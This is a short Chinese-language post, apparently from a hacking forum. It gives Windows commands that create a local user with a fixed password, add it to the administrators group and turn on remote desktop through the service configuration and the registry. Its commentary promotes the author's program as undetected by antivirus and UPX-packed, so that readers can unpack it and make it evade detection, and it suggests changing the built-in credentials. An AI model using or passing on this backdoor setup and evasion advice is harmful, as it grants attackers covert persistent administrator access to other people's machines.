net user ailiangyan ailiangyan /add
net localgroup administrators ailiangyan /add
sc.exe config termservice start= auto
reg.exe add "hkey_local_machine\system\currencontrolset\services\termservice" /v start /t reg_dword /d 0x2 /f
reg.exe add "hkey_local_machine\system\currencontrolset\control\terminal service" /v fdenytsconnections /t reg_dword /d 0x0 /f
net start termservice
原理是大家常见的
不过,这是作者自己写的程序,本来就是免杀的(20080813-22:22AVP),还加了个UPX壳,常见壳方便大家脱壳做免杀~!
另外大家也可以用工具(UE)把用户名和密码改成自己的。
值得鼓励~!